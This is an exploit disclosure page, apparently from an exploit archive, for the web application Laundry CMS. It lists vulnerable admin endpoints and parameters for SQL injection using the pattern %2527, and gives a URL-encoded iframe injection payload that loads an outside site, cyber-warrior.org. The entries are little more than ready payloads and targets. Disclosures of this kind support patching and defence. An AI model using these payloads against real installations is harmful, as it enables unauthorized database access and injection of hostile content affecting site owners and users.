Laundry CMS SQL / Iframe Injection

Laundry CMS suffers from remote SQL injection and iframe injection vulnerabilities.


MD5 | 91203e9cc32fd60108329b5447497452

===========================================================================================
# Exploit Title: Laundry CMS cloth_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : cloth_code, cloth_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address,
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/customer_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address, gender
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/employee_crud/new
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS expse_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : expse_code, expse_type, expse_id
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS service_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : service_code, service_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================

===========================================================================================
# Exploit Title: Laundry CMS Multiple Frame Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
with mobile and computer friendly themes development.
===========================================================================================
# POC - Frame Inj.
# Parameters : cloth_name, service_name, expse_type
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================

Related Posts